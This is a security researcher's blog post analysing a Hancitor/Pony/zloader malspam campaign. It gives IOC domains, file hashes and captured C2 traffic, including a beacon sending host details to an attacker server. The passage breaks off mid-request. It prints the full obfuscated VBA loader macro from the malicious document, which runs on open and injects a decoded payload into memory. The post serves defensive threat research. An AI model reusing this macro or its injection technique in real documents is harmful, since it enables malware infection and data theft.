{"id":697,"date":"2017-01-26T21:45:16","date_gmt":"2017-01-26T21:45:16","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=697"},"modified":"2017-01-27T09:39:37","modified_gmt":"2017-01-27T09:39:37","slug":"2017-01-25-hancitorponyzloader-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=697","title":{"rendered":"2017-01-25 Hancitor\/Pony\/zloader Malspam"},"content":{"rendered":"

In this post I was able to investigate a Hancitor\/Pony\/zloader malspam message. Looking around for some more information about this infection, I was able to find the following links:<\/p>\n

– Brad’s SANS ISC Blog post talking about this exact malspam: http:\/\/isc.sans.edu\/forums\/diary\/HancitorPonyVawtrak+malspam\/21919\/<\/a><\/p>\n

– Hybrid Analysis’ report for another example of this malspam: http:\/\/www.hybrid-analysis.com\/sample\/827873b4d0b846e9bc372bfdac135ec7431baa809366633df4eac15235b9736c?environmentId=100<\/a><\/p>\n

– Looking at the Virustotal comments, I saw Techhelplist had commented about this and then looked for the Tweet: http:\/\/twitter.com\/Techhelplistcom\/status\/824283429181259776<\/a><\/p>\n

As usual, all the artifacts, the PCAP, and ProcMon log can be found in my Github repo for this investigation here<\/a>.<\/p>\n

Update<\/strong>
\nAfter posting this blog entry out on Twitter, David Ledbetter<\/a> sent me an update letting me know that MalwareBytes had covered another maldoc that was the same as the one here. For that great write-up please see there blog here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

Indicators of Compromise:
\n=========================
\napi.ipify[.]org \/ 54.243.91.166
\nhedthowtorspar[.]com \/ 95.169.190.104
\nsy-nitron[.]pl \/ 77.79.246.210
\nrowatterding[.]ru \/ 62.76.89.178
\ncheckip.dyndns[.]com \/ 216.146.38.70
\ncheckip.dyndns[.]com \/ 91.198.22.70
\nhxxp:\/\/hedthowtorspar[.]com\/klu\/forum.php
\nhxxp:\/\/fortmamuchco[.]ru\/klu\/forum.php
\nhxxp:\/\/fortrittotfor[.]ru\/klu\/forum.php
\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/pm1
\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/pm1
\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/pm1
\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/pm1
\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/pm1
\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/pm1
\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/2501
\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/2501
\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/2501
\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/2501
\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/2501
\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/2501<\/p>\n

Artifacts:
\n==========
\nFile name: eFax_kyle.haley.doc
\nFile size: 197KB
\nMD5 hash: ea664510dbc15aa2bd1d865cdd771a58
\nVirustotal : http:\/\/www.virustotal.com\/en\/file\/9c1ad87660e13b35fc48961f0936e9724aa763a3130e194bf67402a118d32657\/analysis\/<\/a>
\nFirst detection: 2017-01-25 15:14:37 UTC
\nDetection ratio: 21 \/ 55<\/p>\n

File name: akpeydzais.crt
\nFile size: 1.0KB
\nMD5 hash: c64eef3e401928160b498c5042617a39
\nVirustotal: NA<\/p>\n

File name: certutil.exe
\nFile size: 102KB
\nMD5 hash: 0c6b43c9602f4d5ac9dcf907103447c4
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/5950722034c8505daa9b359127feb707f16c37d2f69e79d16ee6d9ec37690478\/analysis\/<\/a>
\nFirst detection: 2012-09-08 17:53:10 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: freebl3.dll
\nFile size: 217K
\nMD5 hash: 269beb631b580c6d54db45b5573b1de5
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/ffc7558a61a4e6546cf095bdeabea19f05247a0daa02dca20ea3605e7fc62c77\/analysis\/<\/a>
\nFirst detection: 2013-02-05 15:36:34 UTC
\nDetection ratio: 0 \/ 54<\/p>\n

File name: libnspr4.dll
\nFile size: 195KB
\nMD5 hash: 6e84af2875700285309dd29294365c6a
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/1c158e680749e642e55f721f60a71314e26e03e785cd92e560bf650b83c4c3c8\/analysis\/<\/a>
\nFirst detection: 2013-02-05 15:36:35 UTC
\nDetection ratio: 0 \/ 57<\/p>\n

File name: libplc4.dll
\nFile size: 14KB
\nMD5 hash: 1fae68b740f18290b98b2f9e23313cc2
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/751c2156dc00525668dd990d99f7f61c257951c3fad01c0ee6359fcdff69f933\/analysis\/<\/a>
\nFirst detection: 2013-03-22 18:37:04 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: libplds4.dll
\nFile size: 12KB
\nMD5 hash: 9ae76db13972553a5de5bdd07b1b654d
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/38a906373419501966daf6ec19ca2f8db7b29609128ae5cb424d2aa511652c29\/analysis\/<\/a>
\nFirst detection: 2014-01-22 13:27:20 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: msvcr100.dll
\nFile size: 756KB
\nMD5 hash: 0e37fbfa79d349d672456923ec5fbbe3
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/analysis\/<\/a>
\nFirst detection: 2011-08-10 17:05:25 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: nss3.dll
\nFile size: 780KB
\nMD5 hash: a1c4628d184b6ab25550b1ce74f44792
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/3f997d3f1674de9fd119f275638861bc229352f12c70536d8c83a70fcc370847\/analysis\/<\/a>
\nFirst detection: 2013-03-22 18:52:21 UTC
\nDetection ratio: 0 \/ 56 <\/p>\n

File name: nssdbm3.dll
\nFile size: 106KB
\nMD5 hash: 051652ba7ca426846e936bc5aa3f39f3
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/8eca993570fa55e8fe8f417143eea8128a58472e23074cbd2e6af4d3bb0f0d9a\/analysis\/<\/a>
\nFirst detection: 2013-12-23 13:43:20 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: nssutil3.dll
\nFile size: 92KB
\nMD5 hash: c26e940b474728e728cafe5912ba418a
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/1af1ac51a92b36de8d85d1f572369815404912908c3a489a6cd7ca2350c2a93d\/analysis\/<\/a>
\nFirst detection: 1 \/ 57
\nDetection ratio: 2013-12-23 13:43:24 UTC<\/p>\n

File name: smime3.dll
\nFile size: 96KB
\nMD5 hash: a5c670edf4411bf7f132f4280026137b
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/aba2732c7a016730e94e645dd04e8fafcc173fc2e5e2aac01a1c0c66ead1983e\/analysis\/<\/a>
\nFirst detection: 2014-01-22 13:29:10 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: softokn3.dll
\nFile size: 169KB
\nMD5 hash: 2ab31c9401870adb4e9d88b5a6837abf
\nVirustotal:http:\/\/www.virustotal.com\/en\/file\/22ecece561510f77b100cff8109e5ed492c34707b7b14e0774aaa9ca813de4ad\/analysis\/<\/a>
\nFirst detection: 2014-01-22 13:29:49 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: sqlite3.dll
\nFile size: 414K
\nMD5 hash: b58848a28a1efb85677e344db1fd67e6
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/00db98ab4d50e9b26ecd193bfad6569e1dd395db14246f8c233febba93965f7a\/analysis\/<\/a>
\nFirst detection: 2013-02-05 15:36:47 UTC
\nDetection ratio: 0 \/ 57<\/p>\n

File name: vele.tal
\nFile size: 190KB
\nMD5 hash: 0f2f862c23fbfe43189702a79d2fd969
\nVirustotal: NA<\/p>\n

File name: oqluy.php
\nFile size: 3.0KB
\nMD5 hash: 2c2e142b8d99829a9282647343a24f62
\nVirustotal: NA<\/p>\n

File name: php.exe
\nFile size: 28KB
\nMD5 hash: 4f060d308f8ebdc888c88d94e615d60f
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/0ea0dbcbf78a85b47ec9c98c1fd7c8ff9a71a9986cd6fcf953a1b2f15609d349\/analysis\/<\/a>
\nFirst detection: 2011-08-14 13:21:10 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

File name: php5ts.dll
\nFile size: 5.5MB
\nMD5 hash: 7356593dd0b80023e0b416e66382b63c
\nVirustotal: http:\/\/www.virustotal.com\/en\/file\/018e13cab4c50261776dc7f641f1c3dd1000cafa21759bac221765663efce806\/analysis\/<\/a>
\nFirst detection: 2011-11-01 20:45:32 UTC
\nDetection ratio: 0 \/ 56<\/p>\n

Analysis:
\n=========
\nWhen the user gets this email, they are asked to view the eFax at the URL in the email which actually points to “hxxp:\/\/www.lifelabs.vn\/api\/get.php?id=a3lsZS5oYWxleUByYWNrc3BhY2UuY29t” as seen in the image above. Once the user clicks on this link they are prompted to download and save an Office Word doc.<\/p>\n

\r\nGET \/api\/get.php?id=a3lsZS5oYWxleUByYWNrc3BhY2UuY29t HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: www.lifelabs.vn\r\nDNT: 1\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 25 Jan 2017 15:51:21 GMT\r\nContent-Type: application\/msword;\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Disposition: attachment; filename=eFax_kyle.haley.doc\r\nPragma: private\r\nVary: Accept-Encoding,User-Agent\r\nContent-Encoding: gzip\r\nExpires: Tue, 16 Jun 2020 20:00:00 GMT\r\n<\/pre>\n
Using OfficeMalScanner I was able to pull 3 files out of it that looked suspicious according to OfficeMalScanner. The following are 2 of those 3 files but are still obfuscated.<\/p>\n
\r\nselfaddressed:\r\n==============\r\nAttribute VB_Name = "selfaddressed"\r\n' And when I doubt\r\n' You remind me of just how lucky I am\r\n' Because it's the hardest thing I've ever done\r\n#If Win64 Then\r\n' You remind me of just how lucky I am\r\n' You always seem\r\n' Because it's the hardest thing I've ever done\r\nPublic Declare PtrSafe Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal saxony As LongPtr, ByVal abuna As Any, ByVal sarawakian As LongPtr, ByVal salmo As LongPtr) As LongPtr\r\n' You surprise me with\r\n' \ufeffSometimes I doubt the path I chose\r\n' And my bad examples\r\nPublic Declare PtrSafe Function appreciably Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal heraldry As LongPtr,algometry As LongPtr,blowfly As LongPtr,bruin As LongPtr,conclusive As LongPtr) As Boolean\r\n' You're my belief\r\n' Sometimes my dreams feel all on hold\r\n' There's no doubt that this will make me strong\r\nPublic Declare PtrSafe Function ascription Lib "Shell32.dll" Alias "SHGetDesktopFolder" (myoma As LongPtr)\r\n' If you are dreaming\r\n' Just how perfect you are\r\n' Just how perfect you are\r\nPublic Declare PtrSafe Function distended Lib "Kernel32.dll" Alias "LocalFree" (literati As LongPtr) As LongPtr\r\n' Just how perfect you are\r\n' The stronger one\r\n' Because it's the hardest thing I've ever done\r\nPublic Declare PtrSafe Function discoglossidae Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (cristobalite As LongPtr, dummy As LongPtr, ByVal welloff As LongPtr,pharisaismByVal As LongPtr, accipiter As LongPtr, ByVal ar As LongPtr) As LongPtr\r\n' If you are dreaming\r\n' You surprise me with just how perfect you are\r\n' You remind me of just how perfect you are\r\nPublic Declare PtrSafe Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal chippendale As Any, ByVal chudder As Any, ByVal elbows As Any, ByVal churchdoor As Any, ByVal pyrrhus As Any) As LongPtr\r\n' You remind me of just how lucky I am\r\n' Even with all my flaws\r\n' You surprise me with just how perfect you are\r\nPublic Declare PtrSafe Function already Lib "Shell32.dll" Alias "SHGetSettings" (freshet As LongPtr,caruncle As LongPtr) As LongPtr\r\n' I never want to wake you up\r\n' Out in the world that's beyond my control\r\n' When I'm at my wit's end\r\nPublic Declare PtrSafe Function atlantes Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (vat As LongPtr, abutter As Any,haystack As LongPtr, fit As Any) As Boolean\r\n' Because it's the hardest thing I've ever done\r\n' I'm suppose to be\r\n' I never want to wake you up\r\n\r\n' I never want to wake you up\r\n'\r\n' You search for me\r\n#Else\r\n' The stronger one\r\n' And when I'm lost\r\n' I'm suppose to be\r\nPublic Declare Function solanum Lib "Kernel32.dll" Alias "LocalFree" (spartan As Long) As Long\r\n' You're my belief\r\n' You always seem\r\n' Still, I hold my breath each time you go\r\nPublic Declare Function bargainpriced Lib "Shell32.dll" Alias "SHGetSettings" (geared As Long, followon As Long) As Long\r\n' Just how perfect you are\r\n'\r\n' And my bad examples\r\nPublic Declare Function toastmaster Lib "Shell32.dll" Alias "SHGetDesktopFolder" (aedes As Long)\r\n' Sometimes my dreams feel all on hold\r\n' Because it's the hardest thing I've ever done\r\n' And I'm losing my head\r\nPublic Declare Function latimeridae Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (gorgonocephalus As Long, gradeconstructed As Any, beelzebub As Long, lhonneur As Any) As Boolean\r\n' Because it's the hardest thing I've ever done\r\n' You're my belief\r\n' Sometimes my dreams feel all on hold\r\nPublic Declare Function unapprized Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal affirm As Long, ByVal panonychus As Any, ByVal losing As Any, ByVal harmonically As Any) As Long\r\n' You surprise me with just how perfect you are\r\n' Because it's the hardest thing I've ever done\r\n' You're my belief\r\nPublic Declare Function chimakum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal conversation As Long, hello As Long, reovirus As Long, skater As Long, givenness As Long) As Boolean\r\n' And I'm losing my head\r\n' And when I'm lost\r\n' You remind me of just how lucky I am\r\nPublic Declare Function discoglossidae Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (flexible As Long, endodontist As Long, ByVal allocution As Long, bissextileByVal As Long, dragonnade As Long, ByVal gangrenous As Long) As Long\r\n' You surprise me with\r\n' You remind me of just how perfect you are\r\n' You surprise me with just how perfect you are\r\nPublic Declare Function carnally Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal accueil As Any, ByVal collapsible As Any, ByVal romanian As Any, ByVal hejira As Any, ByVal sorceress As Any) As Long\r\n' Still, I hold my breath each time you go\r\n' Just how perfect you are\r\n' To prove that theory wrong\r\n\r\n' I'm suppose to be\r\n' And when I doubt\r\n' The stronger one\r\n#End If\r\n' You surprise me with\r\n' Still, I hold my breath each time you go\r\n' And my bad examples\r\nFunction bifilar(emperor)\r\nbifilar = AscW(emperor)\r\nEnd Function\r\nFunction nonsuccess(caboose) As String\r\nDim coltsfoot As Variant\r\n\r\ncheckpoint = ail\r\n\r\nDim remonetize As Integer\r\nDim sembarquer(63) As Long\r\nDim cuban As Long\r\nDim blackberry As String\r\nDim indisputable(63) As Long\r\nDim gracilariid As Long\r\nDim deuterogamy As Variant\r\n\r\nDim kudzu(6965) As Byte\r\nDim ichneumon(63) As Long\r\nDim sidewheeler As Long\r\nDim rower As Long\r\naffably = Rnd(363.395 + 288.6023)\r\n\r\nDim regiment As Variant\r\n\r\nDim bootlace() As Byte\r\ncatchpenny = "gouache"\r\n\r\ndithering = 16 + 104 - 86 + 16515038\r\nDim aztreonam As Long\r\n\r\nallhallows = 255\r\nproctor = 64\r\ncaredfor = 33 + 5 + 65242\r\ntestaceology = 262144\r\nDim albification As Variant\r\n\r\nDim gainful As Variant\r\n\r\nhesitancy = 258048\r\nnervousness = 4032\r\nluger = 63\r\nslog = 79 + 4017\r\nambergris = 62 + 59 + 77 + 16711482\r\ngvisum = 126 + 117 + 13\r\ncymbid = 65536\r\nDim affluence As Long\r\npalace = 53 - 53\r\narmorclad = 51 - 53 + 7461\r\nDim gilbert() As Byte\r\ngilbert = VBA.StrConv(caboose, vbFromUnicode)\r\nDim markbelow As String\r\nfierily = 16\r\noiling = 12156\r\noutspeak = 374597\r\noiling = Pmt(0.068, fierily, -22301, outspeak, 0)\r\n\r\nfain = 7459\r\nlanthanum = 35\r\nauthenticate = Log(100) \/ Log(10) + 14\r\nFor affirmance = 0 To fain\r\nIf affirmance Mod 2 = 0 Then\r\ngilbert(affirmance) = gilbert(affirmance) + authenticate\r\nElse\r\ngilbert(affirmance) = gilbert(affirmance) + authenticate - 1\r\nEnd If\r\nNext affirmance\r\nsteprelationship = 37\r\nplatyrrhini = 13272\r\ningenuousness = 253747\r\ncheekbone = SLN(ingenuousness, platyrrhini, steprelationship)\r\n\r\nremonetize = 0\r\nschemist = 0\r\nfiligree = 43\r\npipelaying = immunity\r\nFor gracilariid = 0 To 63\r\nindisputable(gracilariid) = choriotis(gracilariid, proctor, 3)\r\nsembarquer(gracilariid) = choriotis(gracilariid, slog, 3)\r\nichneumon(gracilariid) = choriotis(gracilariid, testaceology, 3)\r\nNext gracilariid\r\nchrome = 99\r\nmoo = 18434\r\nbraise = 504435\r\nmoo = Pmt(0.066, chrome, -36184, braise, 0)\r\n\r\nbootlace = gilbert\r\nchildcare = 37 + 77 + 42 - 152\r\nchionanthus = 39\r\nphotomechanical = 21321\r\nloyalty = 164804\r\nprepared = SLN(loyalty, photomechanical, chionanthus)\r\n\r\nbasilica = 3\r\ncheckpoint = checkpoint\r\n\r\nammodytes = VBA.Math.Round(198.4053 + 497.5379)\r\n\r\naggressiveness = basilica + 1\r\nairy = 2\r\nFor rower = 0 To fain\r\ncretin = bootlace(rower)\r\ndeceleration = bootlace(rower + 2)\r\nsidewheeler = ichneumon(pipelaying(cretin)) _\r\n + sembarquer(pipelaying(bootlace(rower + 1))) + indisputable(pipelaying(deceleration)) + pipelaying(bootlace(rower + basilica))\r\ngracilariid = choriotis(sidewheeler, ambergris, 2)\r\nkudzu(cuban) = choriotis(gracilariid, cymbid, 1)\r\ngracilariid = choriotis(sidewheeler, caredfor, 2)\r\nkudzu(cuban + 1) = choriotis(gracilariid, gvisum, 1)\r\nkudzu(cuban + airy) = choriotis(sidewheeler, allhallows, 2)\r\ncuban = cuban + airy + 1\r\nrower = rower + 3\r\nNext\r\nnonsuccess = kudzu\r\nEnd Function\r\n\r\nFunction immunity()\r\nDim dicta(255) As Byte\r\nnephew = 65\r\nDo\r\ndicta(nephew) = nephew - 65\r\nnephew = nephew + 1\r\nLoop Until nephew = 91\r\nnephew = 48\r\nDo\r\ndicta(nephew) = nephew + 4\r\nnephew = nephew + 1\r\nLoop Until nephew = 58\r\nnephew = 97\r\nDo\r\ndicta(nephew) = nephew - 71\r\nnephew = nephew + 1\r\nLoop Until nephew = 123\r\ndicta(47) = 63\r\nnephew = 43\r\ndicta(nephew) = 62\r\nimmunity = dicta\r\nEnd Function\r\nFunction choriotis(anxiousness, tuille, capillarity)\r\nSelect Case capillarity\r\nCase 1\r\nchoriotis = anxiousness \\ tuille\r\nCase 2\r\nchoriotis = anxiousness And tuille\r\nCase 3\r\nchoriotis = anxiousness * tuille\r\nEnd Select\r\nEnd Function\r\nSub add()\r\n    With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _\r\n        .PageNumbers\r\n        .IncludeChapterNumber = True\r\n        .ChapterPageSeparator = wdSeparatorEnDash\r\n    End With\r\nEnd Sub\r\n\r\n------------------------------------------------------\r\n------------------------------------------------------\r\n\r\nThisDocument:\r\n=============\r\nAttribute VB_Name = "ThisDocument"\r\nAttribute VB_Base = "1Normal.ThisDocument"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_Open()\r\nDim marbled As Long\r\nDim philosophy As Variant\r\nceruse = "movableness"\r\npredestine\r\nneutrino = 46\r\nuncleanly = 16906\r\nalundum = 229440\r\nblearedness = SLN(alundum, uncleanly, neutrino)\r\nEnd Sub\r\nSub predestine()\r\nDim epizoic As Variant\r\nDim endoscopy As String\r\nlowrise = ThisDocument.ComputeStatistics(wdStatisticPages)\r\nmooncalf.review.Value = lowrise + 9\r\nlocalized = "inconceivableness"\r\ndiestrus = "things"\r\nbaldness = "de" & "meri" & "t"\r\nSet putdown = mooncalf.review.SelectedItem\r\nvehement = 15\r\njacksonian = 33516\r\nheavensent = 411417\r\nmanis = SLN(heavensent, jacksonian, vehement)\r\n\r\nkhamti = putdown.Name\r\ncapillata = 118 + 50 + 7292\r\nlandwehr = Right(khamti, capillata)\r\ncolleen = selfaddressed.nonsuccess(landwehr)\r\ncasing = 7\r\ncome = 9798\r\naugusta = 239618\r\ncome = Pmt(0.071, casing, -2400, augusta, 1)\r\n\r\nalleviation = "embarrass"\r\namsonia = "dem" & "onetization"\r\n#If Win64 Then\r\nDim maturational As Long\r\nDim condense As LongPtr\r\nDim ean As LongPtr\r\nDim workweek As Integer\r\n#Else\r\nDim hooflike As Byte\r\nDim ean As Long\r\nDim huff As Variant\r\nDim condense As Long\r\n#End If\r\nchalice = 0\r\nimpudence = "mesoderm"\r\ngrapnel = 4096\r\naboideau = 29\r\namerica = 27171\r\nadamantine = 169122\r\namerica = Pmt(0.0765, aboideau, -24239, adamantine, 1)\r\n\r\ntrichotomy = "acknowledgeable"\r\njeroboam = "easternmost"\r\nawayness = "symptom"\r\ncryptoprocta = 32\r\nwoodworm = 37179\r\npinned = 158715\r\nloire = SLN(pinned, woodworm, cryptoprocta)\r\n\r\nprecautions = colleen\r\nsomali = "servans"\r\nunquestioning = "aoritis"\r\ncondense = tytonidae(precautions)\r\ntracasserie = "propriety"\r\nbushtit = "judiciary"\r\n#If Win64 Then\r\nDim indecisively As Integer\r\nDim monsoon As LongPtr\r\nDuplicate = "faultfinding"\r\nembezzle = "spleenish"\r\neffigies = "disdainfully"\r\nDim furfur As LongPtr\r\nflailing = 33 - 33 + 1280\r\n#ElseIf Win32 Then\r\nmelodically = "menispermaceae"\r\nphonics = "delawarean"\r\nselfdenial = "niceness"\r\nDim monsoon As Long\r\narrest = 36 + 478\r\nDim furfur As Long\r\nflailing = arrest + 3204\r\n\r\n#End If\r\nDim auricularia As Long\r\nDim bouleverser As String\r\nmonsoon = 104 + 23 - 127\r\nean = condense + flailing\r\nfurfur = 1\r\ntrisulcate = unapprized(ean, monsoon, furfur, monsoon)\r\nnnumber = 42\r\nbiretta = 21067\r\napplejack = 321359\r\nequate = SLN(applejack, biretta, nnumber)\r\n\r\nEnd Sub\r\n\r\nFunction tytonidae(mender)\r\nDim aeciospore As Long\r\nDim spinelessness As Integer\r\nDim cubic As String\r\nDim nacimiento As Variant\r\n#If Win64 Then\r\nDim cakile As Byte\r\nDim claustrophobic As LongPtr\r\nunclutch = 8\r\nDim dodo As String\r\nDim debriefing As LongPtr\r\nDim missay As Integer\r\nDim atonality As LongPtr\r\nDim pants As Integer\r\n#Else\r\nDim choregus As Long\r\nDim claustrophobic As Long\r\nunclutch = 4\r\nDim debriefing As Long\r\nDim milkman As String\r\nDim atonality As Long\r\nDim toxicodendron As String\r\nDim exemplary As Long\r\n#End If\r\ncaryatid = catsear(VarPtr(claustrophobic), VarPtr(mender) + 8, unclutch)\r\noperate = -1\r\ndebriefing = 0\r\nfeminate = 0\r\natonality = 29 - 59 + 31 + 9587\r\nhepaticopsida = 34 + 75 + 88 + 3899\r\nequipollent = 40 + 24\r\ndepose = discoglossidae(ByVal operate, debriefing, ByVal feminate, atonality, ByVal hepaticopsida, ByVal equipollent)\r\naffably = ammodytes \/ 287\r\n\r\naffably = affably - 358\r\n\r\ncatsear debriefing, claustrophobic, 60 + 5534\r\ncatenation = 43\r\ncapriole = 29517\r\nnuances = 302286\r\nautologous = SLN(nuances, capriole, catenation)\r\n\r\ntytonidae = debriefing\r\nEnd Function\r\nSub upper()\r\n    Dim InitialCaps As Range\r\n     Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _\r\n        End:=ActiveDocument.Words(3).End)\r\n    InitialCaps.Case = wdUpperCase\r\nEnd Sub\r\n\r\nFunction catsear(quidem, apopemptic, bonnily)\r\n#If Win64 Then\r\nDim pyocyanase As Variant\r\nDim chancellorsville As String\r\nDim algorism As LongPtr\r\nDim sediment As LongPtr\r\nDim belemnitidae As LongPtr\r\nDim chasser As String\r\nDim thuggery As LongPtr\r\nDim detachment As LongPtr\r\n#Else\r\nDim sediment As Long\r\nDim primitively As Integer\r\nDim algorism As Long\r\nDim ballot As Integer\r\nDim thuggery As Long\r\nDim amrinone As Byte\r\nDim belemnitidae As Long\r\nDim pathway As Variant\r\nDim detachment As Long\r\nDim almanac As Variant\r\nDim abient As Integer\r\n#End If\r\ncheckpoint = matutinal\r\naffably = Fix(117.376 + 114.2197)\r\nsediment = quidem\r\ndetachment = bonnily\r\nail = ail\r\nthuggery = apopemptic\r\nhuffing = 16\r\ncrisis = 28804\r\nnasally = 141610\r\ncoagency = SLN(nasally, crisis, huffing)\r\n\r\nmatutinal = catchpenny\r\nalgorism = 96 + 109 + 87 - 293\r\ncarnally ByVal algorism, sediment, thuggery, detachment, belemnitidae\r\naffably = ammodytes And 451\r\nEnd Function<\/pre>\n
Once the macro has been enabled allowing the malicious code to run, most of the traffic is done over port 80 and no other non-standard ports. The first URL that is contacted is api[.]ipify[.]org to obtain the public IP address of the system.<\/p>\n
\r\nGET \/ HTTP\/1.1\r\nAccept: *\/*\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: api.ipify.org\r\nCache-Control: no-cache\r\n\r\nHTTP\/1.1 200 OK\r\nServer: Cowboy\r\nConnection: keep-alive\r\nContent-Type: text\/plain\r\nDate: Wed, 25 Jan 2017 15:57:01 GMT\r\nContent-Length: 14\r\nVia: 1.1 vegur\r\n\r\n162.216.46.149<\/pre>\n
From here there are a couple of different C2s that my infected VM started to callback to via either GET or POST calls. Some of the callbacks are to the domain hedthowtorspar[.]com with details of my system. <\/p>\n
\r\nPOST \/ls5\/forum.php HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: application\/x-www-form-urlencoded\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: hedthowtorspar.com\r\nContent-Length: 110\r\nCache-Control: no-cache\r\n\r\nGUID=9259187252584972296&BUILD=2501&INFO=OPTIMUS @ OPTIMUS\\Administrator&IP=162.216.46.149&TYPE=1&WIN=6.1(x64)\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 25 Jan 2017 15:57:03 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP\/5.4.45\r\n\r\n3e4\r\nFTGUARZAEg4OCkBVVQkDVxQTDggVFFQKFlUNClcZFRQOHxQOVQ4SHxcfCVUODR8UDgMcExwOHx8UVQoXSwYSDg4KQFVVGxkeGRYPGAlUGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVULDxMZEVcJHw4PClUKF0sGEg4OCkBVVRkNFx8AG1QZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQwTHh8VVwkTFhVXGA8TFh4fCFdLVExUSVUKF0sGEg4OCkBVVR4IDxcJVxUPDhYfDlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQ0VCB4YGwNVChdLBhIODgpAVVUdFRAVERsTVw4IFQ8YFh9UGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUZFRQOGxkOVxwVCBdXTVUXFR4PFh8JVQoXSwYSDg4KQFVVEhsIHwgPAxsWExwfVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVHB8fHg0VCB4KCB8JCVUKF0sHAQhAEg4OCkBVVQkDVxQTDggVFFQKFlUNClcZFRQOHxQOVQ4SHxcfCVUODR8UDgMcExwOHx8UVUhPSksGEg4OCkBVVRsZHhkWDxgJVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVCw8TGRFXCR8ODwpVSE9KSwYSDg4KQFVVGQ0XHwAbVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVDBMeHxVXCRMWFVcYDxMWHh8IV0tUTFRJVUhPSksGEg4OCkBVVR4IDxcJVxUPDhYfDlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQ0VCB4YGwNVSE9KSwYSDg4KQFVVHRUQFREbE1cOCBUPGBYfVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVGRUUDhsZDlccFQgXV01VFxUeDxYfCVVIT0pLBhIODgpAVVUSGwgfCA8DGxYTHB9UGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUcHx8eDRUIHgoIHwkJVUhPSksH\r\n0\r\n\r\n-----\r\n\r\nPOST \/klu\/forum.php HTTP\/1.0\r\nHost: hedthowtorspar.com\r\nAccept: *\/*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: 2635\r\nContent-Type: application\/octet-stream\r\nConnection: close\r\nContent-Encoding: 